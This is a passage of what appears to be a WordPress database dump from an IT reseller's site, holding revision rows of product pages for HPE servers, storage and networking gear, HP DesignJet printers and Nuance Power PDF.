Comware v7 and fiber connections, the MSR95x also brings the performance and advanced services available on modular routers, such as IPS and high encryption, to a fixed port form factor.</p><p><strong>[maxbutton id=\"13\"]</strong></p><ul><li><strong>Alcatel-Lucent 7750 Service Router Series</strong></li></ul><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Alcatel-Lucent-7750-Service-Router-Series.png\" alt=\"\" width=\"229\" height=\"171\" /></p><p>The Alcatel-Lucent 7750 Service Router (SR) is a high-performance, multiservice, edge router designed for the concurrent support of advanced end user, business and mobile services on a common IP edge platform. Leveraging the Alcatel-Lucent in-house 400 Gb/s FP3 silicon technology, the 7750 SR enables a wide range of IP services for large enterprises and operators with exceptional performance, scale and service intelligence requirements. The 7750 SR utilizes the Alcatel-Lucent Service Router Operating System (SR OS) and supports service-aware management to enhance operational efficiency.</p><p><strong>[maxbutton id=\"13\"]</strong></p><ul><li><strong>HPE FlexNetwork MSR93x Router Series</strong></li></ul><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-FlexNetwork-MSR93x-Router-Series.png\" alt=\"\" width=\"208\" height=\"156\" /></p><p>HPE MSR93x Router Series delivers a high-performance small-branch router providing integrated routing, switching, security, SIP, 802.11n WLAN connectivity, and 4G LTE/3G in a single unit. With its Converged Infrastructure, it enables faster time to service and enhanced performance while simplifying your network through a single management screen and zero-touch deployment. The MSR93x increases flexibility and agility, delivering extensive connectivity capabilities in a compact, fixed form factor. The MSR93x is based on open standards for seamless integration within small-branch deployment.</p><p><strong>[maxbutton id=\"13\"]</strong></p><p>2.Â <strong>Switches</strong></p><ul><li><strong>HPE Altoline 6921 48SFP+ 6QSFP+ x86 ONIE AC Back-to-Front Switch</strong></li></ul><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Altoline-6921-48SFP-6QSFP-x86-ONIE-AC-Back-to-Front-Switch.png\" alt=\"\" width=\"204\" height=\"153\" /></p><p>The HPE Altoline 6921 Switch Series is an x86-based OCP certified, open-networking, disaggregated family of low-latency 10GbE data center switches in a 1U form factor. Perfect for deployment in web-scale environments as a 10GbE server access switch; optimized for data center hot/cold aisle deployments with reversible airflow. Hardware support for VXLAN is ideal for deployment in multi-tenancy and overlay environments.</p><p><strong>[maxbutton id=\"13\"]</strong></p><ul><li><strong>HPE Altoline 6960 32QSFP28 x86 ONIE AC Front-to-Back Switch</strong></li></ul><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Altoline-6960-32QSFP28-x86-ONIE-AC-Front-to-Back-Switch.png\" alt=\"\" width=\"212\" height=\"159\" /></p><p>HPE Altoline 6960 Switch Series is an open-networking, disaggregated family of low latency 100/50/25GbE data center switches in a 1U form factor. Perfect for deployment in data center environments as 25GbE server access, or 100/50GbE spine switches. It is optimized for data center hot/cold aisle deployments with reversible airflow. The hardware support for VXLAN makes the Altoline 6960 ideal for deployment in multi-tenancy and overlay environments.</p><p><strong>[maxbutton id=\"13\"]</strong></p><p>To discover more, please click the button below or contact us to discuss your needs.</p><p>[maxbutton id=\"1\" ]</p>','HPE','','inherit','closed','closed','','1529-revision-v1','','','2019-10-01 15:58:20','2019-10-01 07:58:20','',1529,'https://bintara.com.my/blog/2019/10/01/1529-revision-v1/',0,'revision','',0),(2767,1,'2018-12-24 15:30:56','2018-12-24 07:30:56','<h2>SERVER AND SYSTEM</h2>\r\n<ol>\r\n 	<li><strong>Rack Servers</strong></li>\r\n</ol>\r\nRack-optimized servers that modernize your data center by delivering performance, resiliency, and scalability for core business-to-business-critical workloads.\r\n<ul>\r\n 	<li><strong>HPE ProLiant DL325 Gen10 Server</strong></li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2509\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-DL325-Gen10-Server.png\" alt=\"\" width=\"241\" height=\"181\" />\r\n\r\nSecure and versatile single socket (1P) 1U AMD EPYCâ„¢ based platform offers an exceptional balance of processor, memory and I/O for virtualization and data intensive workloads. With up to 32 cores, up to 16 DIMMs, 2 TB memory capacity and support for up to 10 NVMe drives, this server delivers 2P performance with 1P economics.\r\n\r\n<strong>[maxbutton id=\"13\"]</strong>\r\n<ul>\r\n 	<li><strong>HPE ProLiant DL385 Gen10 Server</strong></li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2511\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-DL385-Gen10-Server.png\" alt=\"\" width=\"241\" height=\"181\" />\r\n\r\nHewlett Packard Enterprise is extending the worlds most secure industry standard servers to include the HPE ProLiant DL385 Gen10 server, utilizing the AMD EPYC 7000 Series processors. This platform has been designed with the security you need and the flexibility you require to accommodate demanding enterprise workloads. With up to 64 cores, up to 32 DIMMs, or 4 TB memory capacity and support for up to 24 NVMe drives, the HPE ProLiant DL385 Gen10 server delivers a low cost virtual machine (VM) with unprecedented security.\r\n\r\n<strong>[maxbutton id=\"13\"]</strong>\r\n<ul>\r\n 	<li><strong>HPE Apollo 6000 Chassis</strong></li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2512\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Apollo-6000-Chassis.png\" alt=\"\" width=\"202\" height=\"151\" />\r\n\r\nThe HPE Apollo k6000 Chassis is designed with density optimization and HPC solution integration in mind to address these demands. The new modular, fully integrated, and highly flexible chassis is designed to hold the Hewlett Packard Enterprise Gen10 compute servers to fit your specific HPC workloads. It accommodates up to 24 HPE ProLiant XL230k Gen 10 Server trays, redundant power and cooling, Ethernet and high speed fabric switches to address various HPC workload needs. It is a performance optimized, air-cooled solution that fits in customerâ€™s space limitations. This solution offers outstanding configuration flexibility, simplified administration and rack-scale efficiency that lowers the total cost of ownership (TCO) needed for mass scale HPC deployments.\r\n\r\n<strong>[maxbutton id=\"13\"]</strong>\r\n\r\n2.Â <strong>Tower Servers</strong>\r\n\r\nLower costs, boost productivity and keep your small or midsize business running smoothly with servers that provide the options, tools and support you need.\r\n<ul>\r\n 	<li><strong>HPE ProLiant ML110 Gen10 Server</strong></li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2513\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-ML110-Gen10-Server.png\" alt=\"\" width=\"226\" height=\"169\" />\r\n\r\nThe HPE ProLiant ML110 Gen10 server is an enhanced tower with performance, expansion, and growth at an affordable price. It meets most small- and mid-sized businessesâ€™ needs as well as accelerates your business compute. The ProLiant ML110 Gen10 is a single processor tower form factor that can also be placed in a rack server cabinet using 4.5U of rack space. It includes up to five PCIe slots with room to grow with eight large form factor (LFF) or 16 small form factor (SFF) disk drives. It provides six DDR4 DIMM slots supporting HPE DDR4 SmartMemory with a maximum capacity of 192 GB. The HPE ProLiant ML110 Gen10 server also offers optional redundant fan and redundant power supply to satisfy automatic fail-over needs, making this the ideal server for small- to mid-sized businesses and remote offices and branch offices.\r\n\r\n<strong>[maxbutton id=\"13\"]</strong>\r\n<ul>\r\n 	<li><strong>HPE ProLiant ML350 Gen10 Server</strong></li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2514\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-ML350-Gen10-Server.png\" alt=\"\" width=\"201\" height=\"150\" />\r\n\r\nHPE ProLiant ML350 Gen10 server delivers a secure dual-socket tower server with performance, expandability, and proven reliability making it the choice for expanding SMBs, remote offices of larger businesses, and enterprise data centers.Â The shorter re-designed rackable chassis with multiple upgrade options provides flexibility that can expand as your business needs grow. It supports 12 Gb/s SAS, NVMe SSD, embedded 4x1GbE NIC with a broad range of graphics and compute options.\r\n\r\n<strong>[maxbutton id=\"13\"]</strong>\r\n\r\n3.Â <strong>HPE Synergy</strong>\r\n\r\nComposable, software-defined infrastructure that speeds application delivery.\r\n<ul>\r\n 	<li><strong>HPE Synergy 12000 Frame</strong></li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2515\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Synergy-12000-Frame.png\" alt=\"\" width=\"226\" height=\"170\" />\r\n\r\nHPE Synergy 12000 Frames are uniquely architected as Composable Infrastructure (CI) to match the powerful \'infrastructure-as-code\' capabilities of the HPE intelligent software architecture. Flexible access to compute, storage, and fabric resources allows for use and re-purposing. Linking multiple HPE Synergy Frames efficiently scales the infrastructure with a dedicated single view of the entire management network.\r\n\r\n<strong>[maxbutton id=\"13\"]</strong>\r\n<ul>\r\n 	<li><strong>HPE Synergy D3940 Storage Module</strong></li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2516\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Synergy-D3940-Storage-Module.png\" alt=\"\" width=\"222\" height=\"166\" />\r\n\r\nThe HPE Synergy D3940 Storage Module provides a fluid pool of storage resources for the Composable Infrastructure. Additional capacity for compute modules is easily provisioned and intelligently managed with integrated data services for availability and protection. The 40 SFF drive bays per storage module can be populated with 12 G SAS or 6 G SATA drives. Expand up to 4 storage modules in a single Synergy 12000 Frame for a total of 200 drives.\r\n\r\n<strong>[maxbutton id=\"13\"]</strong>\r\n<h2>DATA STORAGE</h2>\r\nFlash storage-integrated, built-for-the-cloud data protection that delivers unparalleled backup, archive and disaster recovery for your enterprise apps.\r\n<ul>\r\n 	<li><strong>HPE StoreOnce Systems</strong></li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2517\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-StoreOnce-Systems.png\" alt=\"\" width=\"208\" height=\"156\" />\r\n\r\nHPE StoreOnce Systems with StoreOnce Catalyst provide a single, high-performance backup architecture that spans the entire enterprise. You can reduce the amount of backup data you need to store by 95% and choose between powerful dedicated appliances for larger offices and data centers, and flexible virtual appliances for smaller and remote offices. Industry leading backup and restore speeds mean that you can meet shrinking backup windows and recovery SLAs. StoreOnce Catalyst prevents exposure of backup copies to ransomware.\r\n\r\n<strong>[maxbutton id=\"13\"]</strong>\r\n<ul>\r\n 	<li><strong>HPE 3PAR StoreServ 8000 Storage</strong></li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2518\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-3PAR-StoreServ-8000-Storage.png\" alt=\"\" width=\"208\" height=\"156\" />\r\n\r\nHPE 3PAR StoreServ 8000 Storage, with the lowest all-flash starting price, delivers the performance advantages of a purpose-built, flash-optimized architecture without compromising resiliency, data services, or data mobility. Unlike other purpose-built flash arrays, 3PAR StoreServ 8000 doesnâ€™t require you to introduce an entirely new architecture to achieve flash-optimized performance. With unmatched versatility, performance, and density, HPE 3PAR StoreServ 8000 Storage has you covered with unified storage of block &amp; file protocols, application managed data protection and simplified fabric zoning along with SAN diagnostics.\r\n\r\n<strong>[maxbutton id=\"13\"]</strong>\r\n<ul>\r\n 	<li><strong>HPE 3PAR StoreServ 9000 Storage</strong></li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2519\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-3PAR-StoreServ-9000-Storage.png\" alt=\"\" width=\"189\" height=\"142\" />\r\n\r\nHPE 3PAR StoreServ 9000 Storage helps you consolidate primary storage workloads â€“ for file and block -- onto an enterprise-class flash array without compromising performance, scalability, data services, or resiliency. This HPE 3PAR 9000 Storage is based on the proven HPE 3PAR architecture and is purpose built for all-flash consolidation, delivering the performance, simplicity and agility needed to support your hybrid IT environment. Whether your applications are virtualized, containerized, or traditional, the HPE 3PAR StoreServ 9000 Storage offers you a solution that can deliver improved business results.\r\n\r\n<strong>[maxbutton id=\"13\"]</strong>\r\n<h2>NETWORKING</h2>\r\n<ol>\r\n 	<li><strong>Router</strong></li>\r\n</ol>\r\nNavigate more devices and simplify complex networks with intelligent management of open standards routing.\r\n<ul>\r\n 	<li><strong>HPE FLexNetwork MSR95x Router Series</strong></li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2520\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-FLexNetwork-MSR95x-Router-Series.png\" alt=\"\" width=\"227\" height=\"171\" />\r\n\r\nHPE MSR95x Router Series delivers high-performance, small branch routing in a single, cost-optimized form factor. Featuring integrated routing, switching, wireless, security, and voice with no additional licensing, boost your service delivery while simplifying the management of the corporate WAN. This series is flexible to deploy, with Zero Touch Provisioning and WAN options with LTE connectivity. With Comware v7 and fiber connections, the MSR95x also brings the performance and advanced services available on modular routers, such as IPS and high encryption, to a fixed port form factor.\r\n\r\n<strong>[maxbutton id=\"13\"]</strong>\r\n<ul>\r\n 	<li><strong>Alcatel-Lucent 7750 Service Router Series</strong></li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2521\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Alcatel-Lucent-7750-Service-Router-Series.png\" alt=\"\" width=\"229\" height=\"171\" />\r\n\r\nThe Alcatel-Lucent 7750 Service Router (SR) is a high-performance, multiservice, edge router designed for the concurrent support of advanced end user, business and mobile services on a common IP edge platform. Leveraging the Alcatel-Lucent in-house 400 Gb/s FP3 silicon technology, the 7750 SR enables a wide range of IP services for large enterprises and operators with exceptional performance, scale and service intelligence requirements. The 7750 SR utilizes the Alcatel-Lucent Service Router Operating System (SR OS) and supports service-aware management to enhance operational efficiency.\r\n\r\n<strong>[maxbutton id=\"13\"]</strong>\r\n<ul>\r\n 	<li><strong>HPE FlexNetwork MSR93x Router Series</strong></li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2522\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-FlexNetwork-MSR93x-Router-Series.png\" alt=\"\" width=\"208\" height=\"156\" />\r\n\r\nHPE MSR93x Router Series delivers a high-performance small-branch router providing integrated routing, switching, security, SIP, 802.11n WLAN connectivity, and 4G LTE/3G in a single unit. With its Converged Infrastructure, it enables faster time to service and enhanced performance while simplifying your network through a single management screen and zero-touch deployment. The MSR93x increases flexibility and agility, delivering extensive connectivity capabilities in a compact, fixed form factor. The MSR93x is based on open standards for seamless integration within small-branch deployment.\r\n\r\n<strong>[maxbutton id=\"13\"]</strong>\r\n\r\n2.Â <strong>Switches</strong>\r\n<ul>\r\n 	<li><strong>HPE Altoline 6921 48SFP+ 6QSFP+ x86 ONIE AC Back-to-Front Switch</strong></li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2523\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Altoline-6921-48SFP-6QSFP-x86-ONIE-AC-Back-to-Front-Switch.png\" alt=\"\" width=\"204\" height=\"153\" />\r\n\r\nThe HPE Altoline 6921 Switch Series is an x86-based OCP certified, open-networking, disaggregated family of low-latency 10GbE data center switches in a 1U form factor. Perfect for deployment in web-scale environments as a 10GbE server access switch; optimized for data center hot/cold aisle deployments with reversible airflow. Hardware support for VXLAN is ideal for deployment in multi-tenancy and overlay environments.\r\n\r\n<strong>[maxbutton id=\"13\"]</strong>\r\n<ul>\r\n 	<li><strong>HPE Altoline 6960 32QSFP28 x86 ONIE AC Front-to-Back Switch</strong></li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2524\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Altoline-6960-32QSFP28-x86-ONIE-AC-Front-to-Back-Switch.png\" alt=\"\" width=\"212\" height=\"159\" />\r\n\r\nHPE Altoline 6960 Switch Series is an open-networking, disaggregated family of low latency 100/50/25GbE data center switches in a 1U form factor. Perfect for deployment in data center environments as 25GbE server access, or 100/50GbE spine switches. It is optimized for data center hot/cold aisle deployments with reversible airflow. The hardware support for VXLAN makes the Altoline 6960 ideal for deployment in multi-tenancy and overlay environments.\r\n\r\n<strong>[maxbutton id=\"13\"]</strong>\r\n\r\n&nbsp;\r\n\r\nTo discover more, please click the button below or contact us to discuss your needs.\r\n\r\n[maxbutton id=\"1\" ]','HPE','','inherit','closed','closed','','1529-revision-v1','','','2018-12-24 15:30:56','2018-12-24 07:30:56','',1529,'https://bintara.com.my/blog/2018/12/24/1529-revision-v1/',0,'revision','',0),(3624,1,'2019-10-01 12:17:59','2019-10-01 04:17:59','<h2 class=\"font-lh3 \">HP DesignJet large-format office printers</h2>\r\n<div class=\"description\">These printers are ideal for individual or multiuser environments, delivering high-quality applications, from black and white CAD drawings to color presentations, while tools like automatic media-roll alignment and accurate print previews help streamline workflows and ensure efficiency.</div>\r\n<div><img class=\"wp-image-2502 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HP-DesignJet-T120-Printer.jpg\" alt=\"\" width=\"242\" height=\"185\" />\r\n<center>HP DesignJet T120 Printer</center>&nbsp;\r\n<h3 class=\"font-lh3 \">The most affordable and compact HP DesignJet printer</h3>\r\n<div class=\"description\">The HP DesignJet T120 Printer fits your budget and your space. Install this compact printer where it\'s most convenient, and enjoy wireless connectivity and easy-to-use features.</div>\r\n<div></div>\r\n</div>\r\n<div>\r\n<ul>\r\n 	<li class=\"small-caption\"><strong>HP DesignJet T1700 Printer series</strong></li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2503\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HP-DesignJet-T1700-Printer-series.jpg\" alt=\"\" width=\"196\" height=\"196\" />\r\n\r\n&nbsp;\r\n<h3 class=\"font-lh3 \">Secure, empowering printer for CAD/GIS workgroups</h3>\r\n<div class=\"description\">Confidently take CAD, GIS color reproduction to the next level with a 44-in HP DesignJet printer that delivers powerful security features, high productivity on even the most complex files, and bright and precise colors. Dynamic security: Cartridges with non-HP chips might not work today or in the future.</div>\r\n<div></div>\r\n<div>\r\n<ul>\r\n 	<li class=\"small-caption\"><strong>HP DesignJet T830 Multifunction Printer series</strong></li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2504\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HP-DesignJet-T830-Multifunction-Printer-series.jpg\" alt=\"\" width=\"272\" height=\"181\" />\r\n<h3 class=\"font-lh3 \">Smart choice for evolving architect/construction offices</h3>\r\n<div class=\"description\">Immediately update all your partners on project review results with the most compact large-format MFP. Intuitive, convenient print/scan/copy and HP DesignJet print quality help you communicate effectively and move the project forward. Dynamic security: Cartridges with non-HP chips might not work today or in the future.</div>\r\n<div></div>\r\n</div>\r\n</div>\r\n<div>\r\n<h3></h3>\r\n<h3 class=\"font-lh3 \">HP DesignJet large-format production printers</h3>\r\n<div class=\"description\">Turn jobs around in record time with market-leading technology that delivers fast print speeds. Produce AEC, CAD drawings, and high-quality photos, POP/POS, posters, canvas, backlits, banners, and event graphics.</div>\r\n</div>\r\n<div>\r\n<div></div>\r\n<ul>\r\n 	<li class=\"small-caption\"><strong>HP DesignJet T3500 Production Multifunction Printe</strong>r</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2505\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HP-DesignJet-T3500-Production-Multifunction-Printer.jpg\" alt=\"\" width=\"199\" height=\"199\" />\r\n<h3 class=\"font-lh3 \">Productivity in full color</h3>\r\n<div class=\"description\">As the most productive, cost-effective HP DesignJet MFP, HP DesignJet T3500 is built for rigorous IT demands. Meet all your black-and-white and color needs, while enjoying low cost of operation, advanced copy/scan features, and unattended operation.</div>\r\n<div></div>\r\n<div>\r\n<ul>\r\n 	<li class=\"small-caption\"><strong>HP DesignJet Z6610 Production Printer</strong></li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2506\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HP-DesignJet-Z6610-Production-Printer.jpg\" alt=\"\" width=\"240\" height=\"184\" />\r\n<h3 class=\"font-lh3 \">The fastest graphics production printing solution</h3>\r\n</div>\r\n</div>\r\n<div></div>\r\n<div>\r\n<div>\r\n<div>Produce sharp, durable prints with the fastest graphics production printing solution, designed to handle production peaks, and that seamlessly integrates into your current workflow.</div>\r\n<div></div>\r\n<div>\r\n<ul>\r\n 	<li class=\"small-caption\"><strong>HP DesignJet Z6810 Production Printer series</strong></li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2507\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HP-DesignJet-Z6810-Production-Printer-series.jpg\" alt=\"\" width=\"312\" height=\"166\" />\r\n<h3 class=\"font-lh3 \">Meet customer high-quality expectations with the fastest production printing solution</h3>\r\nConsistent, accurate color across prints and printers with embedded spectrophotometer. Easily create content and submit jobs using HP Applications Center.\r\n\r\n</div>\r\n</div>\r\n<div></div>\r\n<div>\r\n<div>To discover more, please click the buttons below or contact us to discuss your needs.</div>\r\n</div>\r\n</div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div>\r\n<div></div>\r\n<div>[maxbutton id=\"1\" ]</div>\r\n</div>','HP DesignJet large-format office printers','','inherit','closed','closed','','1528-revision-v1','','','2019-10-01 12:17:59','2019-10-01 04:17:59','',1528,'https://bintara.com.my/blog/2019/10/01/1528-revision-v1/',0,'revision','',0),(2846,1,'2019-01-08 11:22:12','2019-01-08 03:22:12','<h3 class=\"font-lh3 \">HP DesignJet large-format office printers</h3>\r\n<div class=\"description\">These printers are ideal for individual or multiuser environments, delivering high-quality applications, from black and white CAD drawings to color presentations, while tools like automatic media-roll alignment and accurate print previews help streamline workflows and ensure efficiency.</div>\r\n<div></div>\r\n<div>\r\n<ul>\r\n 	<li class=\"small-caption\"><strong>HP DesignJet T120 Printer</strong></li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2502\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HP-DesignJet-T120-Printer.jpg\" alt=\"\" width=\"242\" height=\"185\" />\r\n<h3 class=\"font-lh3 \">The most affordable and compact HP DesignJet printer</h3>\r\n<div class=\"description\">The HP DesignJet T120 Printer fits your budget and your space. Install this compact printer where it\'s most convenient, and enjoy wireless connectivity and easy-to-use features.</div>\r\n<div></div>\r\n</div>\r\n<div>\r\n<ul>\r\n 	<li class=\"small-caption\"><strong>HP DesignJet T1700 Printer series</strong></li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2503\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HP-DesignJet-T1700-Printer-series.jpg\" alt=\"\" width=\"196\" height=\"196\" />\r\n\r\n&nbsp;\r\n<h3 class=\"font-lh3 \">Secure, empowering printer for CAD/GIS workgroups</h3>\r\n<div class=\"description\">Confidently take CAD, GIS color reproduction to the next level with a 44-in HP DesignJet printer that delivers powerful security features, high productivity on even the most complex files, and bright and precise colors. Dynamic security: Cartridges with non-HP chips might not work today or in the future.</div>\r\n<div></div>\r\n<div>\r\n<ul>\r\n 	<li class=\"small-caption\"><strong>HP DesignJet T830 Multifunction Printer series</strong></li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2504\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HP-DesignJet-T830-Multifunction-Printer-series.jpg\" alt=\"\" width=\"272\" height=\"181\" />\r\n<h3 class=\"font-lh3 \">Smart choice for evolving architect/construction offices</h3>\r\n<div class=\"description\">Immediately update all your partners on project review results with the most compact large-format MFP. Intuitive, convenient print/scan/copy and HP DesignJet print quality help you communicate effectively and move the project forward. Dynamic security: Cartridges with non-HP chips might not work today or in the future.</div>\r\n<div></div>\r\n</div>\r\n</div>\r\n<div>\r\n<h3></h3>\r\n<h3 class=\"font-lh3 \">HP DesignJet large-format production printers</h3>\r\n<div class=\"description\">Turn jobs around in record time with market-leading technology that delivers fast print speeds. Produce AEC, CAD drawings, and high-quality photos, POP/POS, posters, canvas, backlits, banners, and event graphics.</div>\r\n</div>\r\n<div>\r\n<div></div>\r\n<ul>\r\n 	<li class=\"small-caption\"><strong>HP DesignJet T3500 Production Multifunction Printe</strong>r</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2505\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HP-DesignJet-T3500-Production-Multifunction-Printer.jpg\" alt=\"\" width=\"199\" height=\"199\" />\r\n<h3 class=\"font-lh3 \">Productivity in full color</h3>\r\n<div class=\"description\">As the most productive, cost-effective HP DesignJet MFP, HP DesignJet T3500 is built for rigorous IT demands. Meet all your black-and-white and color needs, while enjoying low cost of operation, advanced copy/scan features, and unattended operation.</div>\r\n<div></div>\r\n<div>\r\n<ul>\r\n 	<li class=\"small-caption\"><strong>HP DesignJet Z6610 Production Printer</strong></li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2506\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HP-DesignJet-Z6610-Production-Printer.jpg\" alt=\"\" width=\"240\" height=\"184\" />\r\n<h3 class=\"font-lh3 \">The fastest graphics production printing solution</h3>\r\n</div>\r\n</div>\r\n<div></div>\r\n<div>\r\n<div>\r\n<div>Produce sharp, durable prints with the fastest graphics production printing solution, designed to handle production peaks, and that seamlessly integrates into your current workflow.</div>\r\n<div></div>\r\n<div>\r\n<ul>\r\n 	<li class=\"small-caption\"><strong>HP DesignJet Z6810 Production Printer series</strong></li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2507\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HP-DesignJet-Z6810-Production-Printer-series.jpg\" alt=\"\" width=\"312\" height=\"166\" />\r\n<h3 class=\"font-lh3 \">Meet customer high-quality expectations with the fastest production printing solution</h3>\r\nConsistent, accurate color across prints and printers with embedded spectrophotometer. Easily create content and submit jobs using HP Applications Center.\r\n\r\n</div>\r\n</div>\r\n<div></div>\r\n<div>\r\n<div>To discover more, please click the buttons below or contact us to discuss your needs.</div>\r\n</div>\r\n</div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div>\r\n<div></div>\r\n<div>[maxbutton id=\"1\" ]</div>\r\n</div>','HP DesignJet large-format office printers','','inherit','closed','closed','','1528-revision-v1','','','2019-01-08 11:22:12','2019-01-08 03:22:12','',1528,'https://bintara.com.my/blog/2019/01/08/1528-revision-v1/',0,'revision','',0),(2780,1,'2019-01-03 14:43:50','2019-01-03 06:43:50','<h3>Gain control of your PDFs</h3><p>From the leader in secure document workflows, NuanceÂ® Power PDF is the ultimate PDF solution. Perfect for the individual or the enterprise, itâ€™s simply the best way to gain control over PDF files. Power PDF provides superior accuracy, industry standard PDF compatibility and is exceptionally easy to use.</p>https://youtu.be/KJ7-lKGvGQg		\n			<h3>The right PDF solution for every need</h3>		\n		<h3>Create and convert</h3><p>Power PDF is the fastest, most accurate PDF solution available.<br />It faithfully reproduces complex layouts from PDFs or scanned documents in editable formats â€“ even those with columns, tables and graphics.</p><h3>Edit and combine</h3><p>Quickly touch up and edit text and images in PDF files. Power PDF word processing like capabilities sets it apart in ease-of-use.<br />Assemble and organize PDFs with intuitive drag-and-drop tools.</p><h3>Sign and collaborate</h3><p>Power PDF Advanced streamlines document reviews, signing and collaborating.<br />It offers integrated DocuSignÂ® capabilities, fillable forms, and real-time local network collaboration.</p><h4>There are many options today, but only one makes sense: Nuance Power PDF</h4><p>Power PDF provides the ease of use and the advanced functionality to do the job correctlyâ€”at a price that makes sense. See why switching from Adobe Acrobat is a good business decision.</p>		\n										<img width=\"250\" height=\"230\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/box-power-pdf-standard3-left-250x230-en-us.png\" alt=\"\" />											\n		<h3>Power PDF Standard</h3><h4>Fast and accurate conversion and editing</h4><p>Most accurate PDF to Word or Excel conversions of any PDF solution</p><p>Combine, edit, assemble, fill forms and share PDF files</p><p>Scan paper to PDF and create Searchable PDF files</p><p>Easy-to-use Office-style interface with clear and accessible tools</p>		\n										<img width=\"250\" height=\"230\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/box-power-pdf-advanced3-left-250x230-en-us.png\" alt=\"\" />											\n		<h3>Power PDF Advanced</h3><h4>For enhanced security, signing and collaboration</h4><p>Includes all the features of Power PDF Standard as well as additional features for connectivity, collaboration, security and redaction</p><p>Sign and send PDFs for signature with DocuSignÂ®</p><p>Real time collaboration lets multiple people work on the same document, at the same time, over a network</p>		\n										<img width=\"210\" height=\"230\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/icon-img-power-pdf.png\" alt=\"\" />											\n		<h3>Power PDF Advanced: Volume Licensing</h3><h4>Enterprise deployment with a single license to manage</h4><p>Reasonable cost of ownership with fewer products to manage and expert customer support</p><p>Capture budget savings on licensing</p><p>Superior IT management with flexible and customizable deployment options</p>','Nuance','','inherit','closed','closed','','1555-revision-v1','','','2019-01-03 14:43:50','2019-01-03 06:43:50','',1555,'https://bintara.com.my/blog/2019/01/03/1555-revision-v1/',0,'revision','',0),(2778,1,'2019-01-03 14:40:02','2019-01-03 06:40:02','<h3>Gain control of your PDFs</h3><p>From the leader in secure document workflows, NuanceÂ® Power PDF is the ultimate PDF solution. Perfect for the individual or the enterprise, itâ€™s simply the best way to gain control over PDF files. Power PDF provides superior accuracy, industry standard PDF compatibility and is exceptionally easy to use.</p>https://youtu.be/KJ7-lKGvGQg		\n			<h2>The right PDF solution for every need</h2>		\n		<h3>Create and convert</h3><p>Power PDF is the fastest, most accurate PDF solution available.<br />It faithfully reproduces complex layouts from PDFs or scanned documents in editable formats â€“ even those with columns, tables and graphics.</p><h3>Edit and combine</h3><p>Quickly touch up and edit text and images in PDF files. Power PDF word processing like capabilities sets it apart in ease-of-use.<br />Assemble and organize PDFs with intuitive drag-and-drop tools.</p><h3>Sign and collaborate</h3><p>Power PDF Advanced streamlines document reviews, signing and collaborating.<br />It offers integrated DocuSignÂ® capabilities, fillable forms, and real-time local network collaboration.</p><h4>There are many options today, but only one makes sense: Nuance Power PDF</h4><p>Power PDF provides the ease of use and the advanced functionality to do the job correctlyâ€”at a price that makes sense. See why switching from Adobe Acrobat is a good business decision.</p>		\n										<img width=\"250\" height=\"230\" src=\"https://bintara.com.my/wp-content/uploads/2019/01/box-power-pdf-standard3-left-250x230-en-us.png\" alt=\"\" />											\n		<h3>Power PDF Standard</h3><h4>Fast and accurate conversion and editing</h4><p>Most accurate PDF to Word or Excel conversions of any PDF 